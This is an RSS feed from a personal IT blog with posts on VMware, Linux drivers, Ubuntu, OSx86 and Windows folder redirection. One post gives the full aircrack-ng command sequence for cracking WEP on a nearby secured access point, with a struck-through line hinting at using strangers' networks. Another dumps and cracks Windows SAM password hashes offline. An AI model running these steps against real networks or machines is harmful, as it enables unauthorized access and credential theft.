<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>a Flo + a Blog = a Flog &#187; xNix</title>
	<atom:link href="http://florian.puthod.net/blog/category/it/xnix/feed/" rel="self" type="application/rss+xml" />
	<link>http://florian.puthod.net/blog</link>
	<description>my ãƒ–ãƒ­ã‚°</description>
	<lastBuildDate>Tue, 20 Jul 2010 13:57:43 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
	<atom:link rel="next" href="http://florian.puthod.net/blog/category/it/xnix/feed/?page=2" />

		<item>
		<title>ESX4 HA error</title>
		<link>http://florian.puthod.net/blog/2009/esx4-ha-error/</link>
		<comments>http://florian.puthod.net/blog/2009/esx4-ha-error/#comments</comments>
		<pubDate>Wed, 16 Dec 2009 15:50:05 +0000</pubDate>
		<dc:creator>Florian</dc:creator>
				<category><![CDATA[En]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[xNix]]></category>
		<category><![CDATA[esx]]></category>
		<category><![CDATA[esx4]]></category>
		<category><![CDATA[esx4i]]></category>
		<category><![CDATA[HA]]></category>
		<category><![CDATA[vcenter]]></category>
		<category><![CDATA[vmware]]></category>

		<guid isPermaLink="false">http://florian.puthod.net/blog/?p=301</guid>
		<description><![CDATA[I only played with ESX4 regular flavor so far and I wanted to try mixing them with ESX4i. However trying to put that host in my cluster would give me HA error.
Enabling HA gave the error:
&#8220;Cannot complete the configuration of HA agent on the host. See the task for details for addional information. &#8221;
Without much [...]]]></description>
			<content:encoded><![CDATA[<p>I only played with ESX4 regular flavor so far and I wanted to try mixing them with ESX4i. However trying to put that host in my cluster would give me HA error.</p>
<p>Enabling HA gave the error:<br />
&#8220;Cannot complete the configuration of HA agent on the host. See the task for details for addional information. &#8221;</p>
<p>Without much details I was almost ready to blame it on ESX4i. However after checking everything I found out that my DNS servers settings were wrong.</p>
<p>Changing my DNS to the right IPs and HA configuration worked like a charm.</p>
<p>Obviously my sticky keys did not help but of course stressed out the reminder that HA relies on DNS heavily.</p>
]]></content:encoded>
			<wfw:commentRss>http://florian.puthod.net/blog/2009/esx4-ha-error/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Install your atheros wifi card on fedora 7</title>
		<link>http://florian.puthod.net/blog/2007/install-your-atheros-wifi-card-on-fedora-7/</link>
		<comments>http://florian.puthod.net/blog/2007/install-your-atheros-wifi-card-on-fedora-7/#comments</comments>
		<pubDate>Wed, 18 Jul 2007 16:51:32 +0000</pubDate>
		<dc:creator>Florian</dc:creator>
				<category><![CDATA[xNix]]></category>

		<guid isPermaLink="false">http://florian.puthod.net/blog/2007/07/18/install-your-atheros-wifi-card-on-fedora-7/</guid>
		<description><![CDATA[Yes, atheros cards are great but sometime not supported by default by some OS.
To install the madwifi drivers for your atheros on Fedora 7 do the following:
gedit /etc/yum.repos.d/atrpms.repo
and type
[atrpms]
name=Fedora Core $releasever &#8211; $basearch &#8211; ATrpms
baseurl=http://dl.atrpms.net/f$releasever-$basearch/atrpms/stable
gpgkey=http://ATrpms.net/RPM-GPG-KEY.atrpms
gpgcheck=1
and click on SAVE , also root import the gpg key from the terminal:
rpm &#8211;import http://atrpms.net/RPM-GPG-KEY.atrpms
then just use YUM to install [...]]]></description>
			<content:encoded><![CDATA[<p>Yes, atheros cards are great but sometime not supported by default by some OS.</p>
<p>To install the madwifi drivers for your atheros on Fedora 7 do the following:</p>
<blockquote><p>gedit /etc/yum.repos.d/atrpms.repo</p></blockquote>
<p>and type</p>
<blockquote><p>[atrpms]<br />
name=Fedora Core $releasever &#8211; $basearch &#8211; ATrpms<br />
baseurl=http://dl.atrpms.net/f$releasever-$basearch/atrpms/stable<br />
gpgkey=http://ATrpms.net/RPM-GPG-KEY.atrpms<br />
gpgcheck=1</p></blockquote>
<p>and click on SAVE , also root import the gpg key from the terminal:</p>
<blockquote><p>rpm &#8211;import http://atrpms.net/RPM-GPG-KEY.atrpms</p></blockquote>
<p>then just use YUM to install everything you need!</p>
<blockquote><p>yum install madwifi</p></blockquote>
<p>You will get something like this:</p>
<blockquote><p>[root@localhost ~]# yum install madwifi<br />
Loading &#8220;installonlyn&#8221; plugin<br />
Setting up Install Process<br />
Parsing package install arguments<br />
atrpms                    100% |=========================|  951 B    00:00<br />
primary.xml.gz            100% |=========================| 224 kB    00:00<br />
atrpms    : ################################################## 1240/1240<br />
Resolving Dependencies<br />
&#8211;&gt; Running transaction check<br />
&#8212;&gt; Package madwifi.i386 1:0.9.4-38_r2512.fc7 set to be updated<br />
&#8211;&gt; Processing Dependency: madwifi-kmdl-1:0.9.4-38_r2512.fc7 for package: madwifi<br />
&#8211;&gt; Restarting Dependency Resolution with new changes.<br />
&#8211;&gt; Running transaction check<br />
&#8212;&gt; Package madwifi.i386 1:0.9.4-38_r2512.fc7 set to be updated&#8230;</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://florian.puthod.net/blog/2007/install-your-atheros-wifi-card-on-fedora-7/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wifi-less no more</title>
		<link>http://florian.puthod.net/blog/2007/wifi-less-no-more/</link>
		<comments>http://florian.puthod.net/blog/2007/wifi-less-no-more/#comments</comments>
		<pubDate>Fri, 13 Jul 2007 14:50:59 +0000</pubDate>
		<dc:creator>Florian</dc:creator>
				<category><![CDATA[IT]]></category>
		<category><![CDATA[xNix]]></category>

		<guid isPermaLink="false">http://florian.puthod.net/blog/2007/07/13/wifi-less-no-more/</guid>
		<description><![CDATA[For the first time in my life, I happened to find myself without any wireless connectivity I could easily hook up to.  I needed network-internet connectivity but around me only secured wifi Access Points.
I needed to find the key I lost.
How could I connect without knowing any of those WEP or WAP keys?
I suddently [...]]]></description>
			<content:encoded><![CDATA[<p><strike>For the first time in my life, I happened to find myself without any wireless connectivity I could easily hook up to.  I needed network-internet connectivity but around me only secured wifi Access Points.</strike></p>
<p>I needed to find the key I lost.</p>
<p>How could I connect without knowing any of those WEP or WAP keys?</p>
<p>I suddently remember that I  always have in my laptop CD pockets a very handy CD: backtrack 2. It is very convenient live CD that helps you solve a lot of nice things. It also have tools to scan wifi!</p>
<p>My ubuntu distro install did not have any of those tools installed so here I go, I reboot and run this live CD.</p>
<p>First you need to enable the monitor mode on your interface:</p>
<blockquote><p>#airmon-ng start ath0</p></blockquote>
<p>then just try to run a airodump to scan around</p>
<blockquote><p>#airodump-ng ath0 out 0</p></blockquote>
<p>If you get the wifi around you it means you are ready to play.</p>
<p>Once you see an AP with a decent power (closer to you), use aireplay to inject packets</p>
<blockquote><p>#aireplay-ng -1 0 -e Target_ID -a MACoftheAP -h Your_MAC ath0</p></blockquote>
<p>It will sending authentication requests and you should eventually get this:</p>
<blockquote><p>Association successful <img src='http://florian.puthod.net/blog/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p></blockquote>
<p>This means you are associated with the AP and ready to replay IVS.</p>
<p>you may want to run this association every X sec so you do not lose the AP connection.</p>
<p>This command will reassociate you every 20 secondes:</p>
<blockquote><p>#aireplay-ng -1 20 -e Target_ID -a MACoftheAP -h Your_MAC ath0</p></blockquote>
<p>So once associated, send packets as following. If you are not associated you see no send packet:</p>
<blockquote><p>#aireplay-ng -3 -b MacoftheAP -h Your_MAC -x 600 ath0</p></blockquote>
<p>You must also start airodump to capture replies, capture only the IVS to save space on the target channel:</p>
<blockquote><p>#airodump-ng -w out &#8211;ivs &#8211;channel X ath0</p>
<p>aireplay will read:</p></blockquote>
<blockquote><p>Read 12345 packets (got 123 APR requests), sent 12345 packets&#8230;</p></blockquote>
<p>You have to key sending until you get a lot of IVS (check airodump). If it stops sending, try reassociating with the AP.</p>
<p>Once you have a lot of IVS, you can start running aircrack. Just run it from another console as it can read the output file as it updates.</p>
<blockquote><p>#aircrack-ng -x -0 out.ivs</p></blockquote>
<p>When you see a &#8220;key found&#8221; message you are ready to get some network-internet connection.</p>
<p>Just enter:</p>
<blockquote><p>#iwconfig ath0 mode Managed key XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX<br />
#dhcpcd ath0</p></blockquote>
<p>then a little ifconfig will confirm you are connect and able to get an ip from the AP.  Voila! I was able to check what I needed and then go away.</p>
]]></content:encoded>
			<wfw:commentRss>http://florian.puthod.net/blog/2007/wifi-less-no-more/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>A quick and dirty Windows password recovery</title>
		<link>http://florian.puthod.net/blog/2007/a-quick-and-dirty-windows-password-recovery/</link>
		<comments>http://florian.puthod.net/blog/2007/a-quick-and-dirty-windows-password-recovery/#comments</comments>
		<pubDate>Thu, 05 Jul 2007 20:00:04 +0000</pubDate>
		<dc:creator>Florian</dc:creator>
				<category><![CDATA[Windows]]></category>
		<category><![CDATA[xNix]]></category>

		<guid isPermaLink="false">http://florian.puthod.net/blog/2007/07/06/a-quick-and-dirty-windows-password-recovery/</guid>
		<description><![CDATA[Boot the Backtrack CD.
Change dir to your Windows mount point:
# cd /mnt/hda2/WINDOWS/system32/config
Copy the SAM and the system Registry hive to the temp dir:
# cp SAM /tmp
# cp system /tmp
Prepare our wordlist:
# cd /pentest/password/dictionaries/
# gunzip -c wordlist.txt.Z &#62; /tmp/words.txt
# cd /tmp
As the Windows hashes (in the SAM file) are encrypted, we need this key (called bootkey) [...]]]></description>
			<content:encoded><![CDATA[<p>Boot the <a href="http://www.remote-exploit.org/index.php/BackTrack">Backtrack</a> CD.</p>
<p>Change dir to your Windows mount point:<br />
# cd /mnt/hda2/WINDOWS/system32/config<br />
Copy the SAM and the system Registry hive to the temp dir:<br />
# cp SAM /tmp<br />
# cp system /tmp<br />
Prepare our wordlist:<br />
# cd /pentest/password/dictionaries/<br />
# gunzip -c wordlist.txt.Z &gt; /tmp/words.txt<br />
# cd /tmp</p>
<p>As the Windows hashes (in the SAM file) are encrypted, we need this key (called bootkey) to decrypt the SAM hashes:<br />
# bkhive system key<br />
Now we can dump the password hashes out of the SAM file:<br />
# samdump2 SAM key &gt; /tmp/hashes.txt</p>
<p>Lets crack those hashes&#8230; the easiest way would be, if the password is in the wordlist, we use john for this case:<br />
# john -w=words.txt -f=NT hashes.txt<br />
No luck? Lets use the brute force method:<br />
# john &#8211;incremental:all -f=NT hashes.txt</p>
<p>If this takes too long you could use <a href="http://ophcrack.sourceforge.net/">ophcrack.</a> This tool uses <a href="http://en.wikipedia.org/wiki/Rainbow_table">rainbow tables</a> and should crack your hashes in a few seconds, but you need to download those rainbow tables (350mb or 700mb or you can generate them yourself) which are not included on the Backtrack cd (for a obvious reason&#8230;). Or you can use the <a href="http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/index.php">oph online cracker</a>, which should be quite fast.</p>
]]></content:encoded>
			<wfw:commentRss>http://florian.puthod.net/blog/2007/a-quick-and-dirty-windows-password-recovery/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Amarok feisty fix</title>
		<link>http://florian.puthod.net/blog/2007/amarok-feisty-fix/</link>
		<comments>http://florian.puthod.net/blog/2007/amarok-feisty-fix/#comments</comments>
		<pubDate>Sun, 24 Jun 2007 15:42:40 +0000</pubDate>
		<dc:creator>Florian</dc:creator>
				<category><![CDATA[xNix]]></category>

		<guid isPermaLink="false">http://florian.puthod.net/blog/2007/06/24/amarok-feisty-fix/</guid>
		<description><![CDATA[Amarok is a nice media player for your ubuntu. it leaves your files alone (yeah!) and maintain its own database watching the directory you tell it to watch.
However, in Ubuntu Amarok has no mp3 support. This seems not to be installed automatically and needs to be done manually.
No worries, this is easy when you know [...]]]></description>
			<content:encoded><![CDATA[<p>Amarok is a nice media player for your ubuntu. it leaves your files alone (yeah!) and maintain its own database watching the directory you tell it to watch.</p>
<p>However, in Ubuntu Amarok has no mp3 support. This seems not to be installed automatically and needs to be done manually.</p>
<p>No worries, this is easy when you know where to look.</p>
<p>Amarok will freeze when you try to play any mp3 if you do not do this.</p>
<p>First, close any Amarok instance.</p>
<p>Go to /usr/lib/amarok, where you will find an install-mp3 file</p>
<p>Just run it. and voila! restart Amarok and there you are.</p>
<p>Oh I was talking about Amarok 1.4 .6 on Feisty.</p>
]]></content:encoded>
			<wfw:commentRss>http://florian.puthod.net/blog/2007/amarok-feisty-fix/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>switched to ubuntu</title>
		<link>http://florian.puthod.net/blog/2007/switched-to-ubuntu/</link>
		<comments>http://florian.puthod.net/blog/2007/switched-to-ubuntu/#comments</comments>
		<pubDate>Sat, 23 Jun 2007 14:56:25 +0000</pubDate>
		<dc:creator>Florian</dc:creator>
				<category><![CDATA[IT]]></category>
		<category><![CDATA[xNix]]></category>

		<guid isPermaLink="false">http://florian.puthod.net/blog/2007/06/23/switched-to-ubuntu/</guid>
		<description><![CDATA[yes, I did the jump. Last night I turned my XP SP2 valliant box into a Ubuntu feisty box. I never really tries the live cd but read a few things about this distro.
So far I really like it. I have not tried all the things I used to do with my XP SP2.  [...]]]></description>
			<content:encoded><![CDATA[<p>yes, I did the jump. Last night I turned my XP SP2 valliant box into a Ubuntu feisty box. I never really tries the live cd but read a few things about this distro.</p>
<p>So far I really like it. I have not tried all the things I used to do with my XP SP2.  So far I just can miss my Densha de go simulation game but still think it might work with Wine.</p>
<p>I wanted to play for Xvid videos I had and BAAAM the player says, there is no codec installed for this, would you like to go search and install, clicked YES and the videos plays. It is really pleasant. really.</p>
<p>Today I want to try Beryl. <a href="http://video.google.ca/url?docid=-4310386770055344940&amp;esrc=sr1&amp;ev=v&amp;q=ubuntu+beryl&amp;vidurl=/videoplay%3Fdocid%3D-4310386770055344940%26q%3Dubuntu%2Bberyl%26total%3D1607%26start%3D0%26num%3D10%26so%3D0%26type%3Dsearch%26plindex%3D0&amp;usg=AL29H23Q7IeeEjdidNEJmEwtAOS41TXm5w" target="_blank">This video really made me think about it. </a></p>
<p>Please make sure your card is supported for accelerated graphics. In a terminal type:</p>
<blockquote><p>glxinfo | grep direct</p></blockquote>
<p>If you get this output back, your card should work:</p>
<p>Direct rendering: Yes</p>
<p>If you get a &#8220;no&#8221; from this test, please install the correct driver.</p>
<p>To install the driver, use the Feisty&#8217;s RestrictedDriversManager to install the Graphics card drivers. I like Feisty for that, every thing is easy.</p>
<p>Installing Beryl is as easy. Make sure you have multiverse [Repositories] enabled (Its on by default) and install using:</p>
<blockquote><p>sudo apt-get install beryl beryl-manager emerald-themes</p></blockquote>
<p>To run beryl, launch using the excecute windows (Alt+F2 then Enter)</p>
<blockquote><p>beryl-manager</p></blockquote>
<p>You may want to add Beryl to your start up if you really like it.</p>
<p>Add beryl-manager to the list of startup programs, by going to System -&gt; Preferences -&gt; Sessions, and under the tab Startup Programs and clicking New. Enter for both Name and Command arguments beryl-manager.</p>
<p>Misc: If you&#8217;re still having issues visit the <a href="http://wiki.beryl-project.org/wiki/1" target="_blank">Ubuntu Wiki</a></p>
]]></content:encoded>
			<wfw:commentRss>http://florian.puthod.net/blog/2007/switched-to-ubuntu/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mac OSx86 10.4.6 on Thinkpad T60</title>
		<link>http://florian.puthod.net/blog/2006/mac-osx86-1046-on-t60/</link>
		<comments>http://florian.puthod.net/blog/2006/mac-osx86-1046-on-t60/#comments</comments>
		<pubDate>Tue, 26 Dec 2006 04:24:42 +0000</pubDate>
		<dc:creator>Florian</dc:creator>
				<category><![CDATA[En]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[xNix]]></category>

		<guid isPermaLink="false">http://florian.puthod.net/blog/?p=100</guid>
		<description><![CDATA[i have previously explained how to install OSx86 aka MacOS X on a T60 thinkpad 200762U, I would like here really sum up everything you need for the post OS install.
After installing the OS you will get a working T60 with no sound, a lousy resolution and no wireless. Let&#8217;s review one after another.
Sound
1) Delete [...]]]></description>
			<content:encoded><![CDATA[<p>i have <a href="http://florian.puthod.net/blog/?p=82">previously</a> explained how to install OSx86 aka MacOS X on a T60 thinkpad 200762U, I would like here really sum up everything you need for the post OS install.</p>
<p>After installing the OS you will get a working T60 with no sound, a lousy resolution and no wireless. Let&#8217;s review one after another.</p>
<p><strong>Sound</strong></p>
<p>1) Delete AppleHDA.kext:</p>
<pre>* In Terminal, type: sudo rm -rf /System/Library/Extensions/AppleHDA.kext
* sudo rm -rf /System/Library/Extensions.mkext
* sudo rm -rf /System/Library/Extensions.kext</pre>
<p>2) Edit AppleAzaliaAudio.kext:</p>
<pre>* In Terminal, type: sudo pico /System/Library/Extensions/AppleAzaliaAudio.kext/Contents/Info.plist
* Search for (use hotkey= ctrl + w):
IOHDAudioCodecVendorID
* change the string to:
0x10ec0882
* Exit pico
* sudo pico /System/Library/Extensions/AppleAzaliaAudio.kext/Contents/PlugIns/AppleAzaliaController.kext/Contents/Info.plist
* Search for (use hotkey= ctrl + w):
IOPCIPrimaryMatch
* change the string to:
0x27d88086
* Exit pico</pre>
<p>3) Clean up the system:</p>
<pre>* In Terminal, type: sudo kextload /System/Library/Extensions/AppleAzaliaAudio.kext
* kextcache -k /System/Library/Extensions/</pre>
<p>4) Then, reboot and enjoy sound out of two channels.</p>
<pre><strong>Video</strong></pre>
<p>1) Open the file:<br />
/System/Library/Extensions/ATIRadeonX1000.kext/Contents/Info.plist</p>
<p>2) and find the line &#8220;IOPCIMatch&#8221;. Modify the next line to say: &#8220;0&#215;71091002 0x71C41002 0x71C01002&#8243;</p>
<p>3) Open the file &#8220;/Library/Preferences/SystemConfiguration/com.apple.Boot.plist&#8221;</p>
<p>4) after the lines:<br />
&#8220;Boot Graphics<br />
Yes&#8221;</p>
<pre>add the lines:"Graphics Mode
1400x1050x32"</pre>
<p><strong>Wireless</strong></p>
<p>The 200762U has the ThinkPad 11a/b/g Wireless LAN Mini-PCI Express Adapter (lenovo.com part #: 40Y7026) which is compatible with OSx</p>
<p>1) You must download the Apple 10.4.5 intel upgrade available <a target="_blank" href="http://www.apple.com/downloads/macosx/apple/macosxupdate1045forintel.html">here</a></p>
<p>2) You must also download a program called Pacifist available <a target="_blank" href="http://macupdate.com/info.php/id/6812">here</a><br />
3) Install Pacifist and double click on the apple upgrade to mount it.</p>
<p>4) Next, open up pacifist and browse to the file inside the mounted image called &#8220;MacOSXUpd10.4.5Intel.pkg&#8221;.</p>
<p>5) After it opens, click &#8220;find&#8221; and search for &#8220;IO80211Family.kext&#8221;. Drag that file into the folder: &#8220;/System/Library/Extensions/&#8221; replacing any pre-existing files.</p>
<p>6) Delete the files &#8220;/System/Library/Extensions.kextcache&#8221; and &#8220;/System/Library/Extensions.mkext&#8221;</p>
<p>And reboot! Alternatively you may want to check if your wireless worked before rebooting.</p>
<p>7) open the disk utility (/Application/Utilities/Disk Utility), then repair permissions on your Startup volume (may take a little while)</p>
<p> <img src='http://florian.puthod.net/blog/wp-includes/images/smilies/icon_cool.gif' alt='8)' class='wp-smiley' /> open up terminal, and switch to root (enter sudo -s, enter your user password)</p>
<pre>cd /System/Library/Extensions
chmod -R 755 IO80211family.kext
chown -R root:wheel IO80211family.kext</pre>
<p>then list the contents</p>
<p>ls -l</p>
<p>make sure the IO80211Family line looks like this:</p>
<pre>drwxr-xr-x   3 root  wheel  102 Feb  2  2006 IO80211Family.kext</pre>
<p>check that the permissions propagated to subdirectories:</p>
<pre>cd IO80211Family.kext/contents/plugins
ls -l</pre>
<p>should look like this:</p>
<pre>total 0
drwxr-xr-x   3 root  wheel  102 Feb  2  2006 AirPortAtheros5424.kext
drwxr-xr-x   3 root  wheel  102 Feb  2  2006 AppleAirPortBrcm4311.kext</pre>
<p>then test that the extensions works:</p>
<pre>kextload AirPortAtheros5424.kext</pre>
<p>should give a extension loaded successfully message</p>
<p>then you have to go to System Preferences>Network<br />
a message should pop up telling you you have a new AirPort. from the Show: box, pick AirPort. you can set the options here, i suggest you check the Show airport status in menu bar, make sure you click apply now.</p>
<p>There you have it, fully working native Atheros card!</p>
<p>To do now is to get the BlueTooth working&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://florian.puthod.net/blog/2006/mac-osx86-1046-on-t60/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>i&#124;o tour 06</title>
		<link>http://florian.puthod.net/blog/2006/io-tour-06/</link>
		<comments>http://florian.puthod.net/blog/2006/io-tour-06/#comments</comments>
		<pubDate>Tue, 17 Oct 2006 14:42:25 +0000</pubDate>
		<dc:creator>Florian</dc:creator>
				<category><![CDATA[En]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[xNix]]></category>

		<guid isPermaLink="false">http://florian.puthod.net/blog/?p=79</guid>
		<description><![CDATA[I am now attending the infrastructure optimization tour 06 in Toronto at the convention center.

Waiting for the presentation to begin, I have to say that MSFT is not really big on goodies:a notepad and a pen, this is lame.
Well I hope this tour will be more interesting than a those ridiculous accessories&#8230; Today we have [...]]]></description>
			<content:encoded><![CDATA[<p>I am now attending the infrastructure optimization tour 06 in Toronto at the convention center.</p>
<p><img id="image80" alt="iotour.jpg" src="http://florian.puthod.net/blog/wp-content/uploads/2006/10/iotour.jpg" /></p>
<p>Waiting for the presentation to begin, I have to say that MSFT is not really big on goodies:a notepad and a pen, this is lame.</p>
<p>Well I hope this tour will be more interesting than a those ridiculous accessories&#8230; Today we have Rick and Rodney both from IT pro advisor. Blue MS Tech shirt and white pants.</p>
<p>We start off with a spoof of 24h&#8230;ITU a funny show of a IT unit with a lousy boss and stupids interns in the server room.</p>
<p>Then a kind of boring presentation about Tech resource and other technet links.</p>
<p><img alt="sany2067.JPG" id="image83" src="http://florian.puthod.net/blog/wp-content/uploads/2006/11/sany2067.thumbnail.JPG" /><br />
Windows Server 2003 R2 is the big update in this presentation has it really is focused on central management for multiple sites offices. Especially when they promote the Branch Office Infrastructure Solution paper, describing a lot of solutions topologies and examples, centralized or distributed management seems easy, I have not checked this document yet, but I will not fail to do so.</p>
<p>During the past hours, I have been learning a lot about DFS and RDS. It seems to be really the improvement point for R2, as they have mainly improved those points.</p>
<p>I was expecting to see about MOM, but nothing so far. But meanwhile, handing in the survey had mysefl giving some beta stuff- office 2007, W2k3 R2 eval, Vista  RC1 preview and a full copy of Virtual server 2005 (even tho R2 includes 4 virtual server licenses)</p>
<p>By the end we had an overview of what I wanted to see: MOM. Well it is not that impressive. It looks like a boosted mmc with better filtering and a new task panel associated to object you click on. Apparently features for an apps (DFS, RFS, Exchange) must be purchased separately. they have not been through the licensing but i guess this is a rip off. The only nice since is that with the help of a good KB, you can set different behavior to solve an error or warning event. It looks like an automation for event viewer.</p>
<p>Well it was good to seen those products live. DPM sounds very good with continuous backup on files, it is too bad the you cannot for now backup the backed up files.  DFS looks even better now than the mmc as been improved but only for W2K3 R2. Also ISA 2006 adds a lot of centralized management capabilities, but I have not used ISA for a long time now as SBS is not in my sight anymore because of different scale I deal with.</p>
<p>While I test everything and imagine what can be used out of this, you can go on their blog here: <a target="_blank" href="http://blogs.technet.com/canitpro/">http://blogs.technet.com/canitpro/<br />
</a> and here <a href="http://www.microsoft.com/canada/technet/iotour06/thanks/">http://www.microsoft.com/canada/technet/iotour06/thanks/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://florian.puthod.net/blog/2006/io-tour-06/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Redirect docs and settings somewhere else</title>
		<link>http://florian.puthod.net/blog/2006/redirect-docs-and-settings-somewhere-else/</link>
		<comments>http://florian.puthod.net/blog/2006/redirect-docs-and-settings-somewhere-else/#comments</comments>
		<pubDate>Thu, 21 Sep 2006 01:20:58 +0000</pubDate>
		<dc:creator>Florian</dc:creator>
				<category><![CDATA[En]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[xNix]]></category>

		<guid isPermaLink="false">http://florian.puthod.net/blog/archives/63</guid>
		<description><![CDATA[One of your IT problems is ensuring that it has enough free space on its system partition to be happy. Microsoft is no help since its default installation places directories such as Documents and Settings, Program Files, and Inetpub on the monolithic C: volume. Presumably they do this to make things simpler for users. A [...]]]></description>
			<content:encoded><![CDATA[<p>One of your IT problems is ensuring that it has enough free space on its system partition to be happy. Microsoft is no help since its default installation places directories such as Documents and Settings, Program Files, and Inetpub on the monolithic C: volume. Presumably they do this to make things simpler for users. A single volume is the most efficient allocation of disk, but when your disk does fill up, the consequences are much more serious. This page provides instructions on how to move non-OS directories to other volumes so that you can more easily avoid filling up your system partition.</p>
<p>Windows throws a fit when its system partition nears capacity; it&#8217;s prudent to use a separate partition for application installations and user data. Here&#8217;s how I move these directories under Windows manually.</p>
<p>This technique makes use of NTFS junctions, which are a bit like cross-linked files you may have encountered back in the day with DOS&#8230; only junctions are cross-linked on purpose! This is also similar to UNIX soft links in that you are creating a second access path to a single directory. Because Windows takes locks on some files in the Program Files and user profile directory trees, we need to use safe mode and two different administrative accounts to pull this off. Safe mode lets us work with Program Files. The logged-on-user can&#8217;t manipulate its own files, but you can use two different admin accounts to copy the whole user profiles directory in two passes.</p>
<p>You may also want to check <a target="_blank" href="http://support.microsoft.com/kb/q236621/">what Microsoft recommends for this matter</a>. You could even go user based.<br />
You could just do a search and replace in the registry to avoid the junctions and also create a GPO but I&#8217;d come back with that later on as we&#8217;ll need to create .adm file for this purpose, but this is less error-prone and frees you from worrying about whether an installer will insist on going to your C: drive.</p>
<ol>
<li>Install the linkd utility from the Windows 2000 Pro       Resource Kit (It isn&#8217;t available with the no-cost download of       W2K resource kit tools, but I&#8217;ll bet the linkd provided with the       no-cost download <a target="_blank" href="http://www.microsoft.com/downloads/details.aspx?FamilyID=9D467A69-57FF-4AE7-96EE-B18C4790CFFD&#038;displaylang=en">Windows       Server 2003 Resource Kit Tools</a> is the same thing       anyway). Alternatively, try <a target="_blank" href="http://www.sysinternals.com/utilities/junction.html">Junction from Sysinternals</a>.</li>
<li>Make sure you have at least two local users with       membership in the local Administrators group. You will need to       be able to login as both of these users. For clarity, I&#8217;ll call       these <var>admin1</var> and <var>admin2</var>, but you can pick whatever names you like.</li>
<li>Make sure that you&#8217;ve logged in at least once as each of       these users. This will ensure that Windows has created a profile       for them. Determine the path to each administrator&#8217;s       profile. You need to know the directory names under C:\Documents       and Settings\ that correspond to each account. If you fail to       create a profile before you continue with this procedure,       Windows will create the profile while you&#8217;re in       command-prompt-only-safemode. In that case, it does something a       little different and the result will be that it will create a       new profile for the user if you try to login after this       procedure. That wouldn&#8217;t be a disaster, but you would probably       want to clean up the abandoned profile and the new/permanent       profile would have a funny name like       &#8220;numbertwo.copland&#8221; if your computer is named       copland. I&#8217;ll assume that these directories are called       <var>C:\Documents and Settings\admin1</var> and       <var>C:\Documents and Settings\admin2</var> so that I can refer       to them easily later.</li>
<li>Boot into safe mode, command prompt only. Login with an       administrative account (<var>admin1</var>).</li>
<li><samp>C:\></samp><kbd>xcopy /s /e /h /r /k /o /x "Program Files" "D:\Program Files"</kbd></li>
<li><samp>C:\></samp><kbd>xcopy /s /e /h /r /k /o /x "Documents and Settings" "D:\Documents and Settings"</kbd> â†? this will result in an error message about file sharing or locking or so.</li>
<li><kbd>ctrl-alt-del</kbd> to access the security menu and log out.</li>
<li>login as the other administrator (<var>admin2</var>)</li>
<li><samp>C:\></samp><kbd>xcopy /s /e /h /r /k /o /x /c /y "Documents and Settings" "D:\Documents and Settings"</kbd></li>
<li><samp>C:\></samp><kbd>rd /s "Program Files"</kbd></li>
<li><samp>C:\></samp><kbd>"D:\Program Files\Resource Pro Kit\linkd.exe" "Program Files" "D:\Program Files"</kbd></li>
<li><samp>C:\></samp><kbd>rd /s "Documents and Settings"</kbd> â†? this will produce an error about file sharing or locking or so.</li>
<li><samp>C:\></samp><kbd>cd "Documents and Settings"</kbd></li>
<li><samp>C:\Documents and Settings></samp><kbd>linkd "<var>admin1</var>" "D:\Documents and Settings\<var>admin1</var>"</kbd></li>
<li><kbd>ctrl-alt-del</kbd> to access the security menu and logout</li>
<li>login as <var>admin1</var></li>
<li><samp>C:\></samp><kbd>rd /s "Documents and Settings"</kbd></li>
<li><samp>C:\></samp><kbd>linkd "Documents and Settings" "D:\Documents and Settings"</kbd></li>
<li><kbd>ctrl-alt-del</kbd> to access the security menu and restart into Windows.</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://florian.puthod.net/blog/2006/redirect-docs-and-settings-somewhere-else/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Console power</title>
		<link>http://florian.puthod.net/blog/2006/console-power/</link>
		<comments>http://florian.puthod.net/blog/2006/console-power/#comments</comments>
		<pubDate>Mon, 01 May 2006 07:42:04 +0000</pubDate>
		<dc:creator>Florian</dc:creator>
				<category><![CDATA[IT]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[xNix]]></category>

		<guid isPermaLink="false">http://florian.puthod.net/blog/?p=17</guid>
		<description><![CDATA[If you are looking for some command prompt alternative. Eventhough I think that the one embedded to XP is still good enough after some tweaks:

Options &#124; Command History &#124; Buffer Size &#124; 500
Options &#124; Command History &#124; Discard Old Duplicates &#124; True
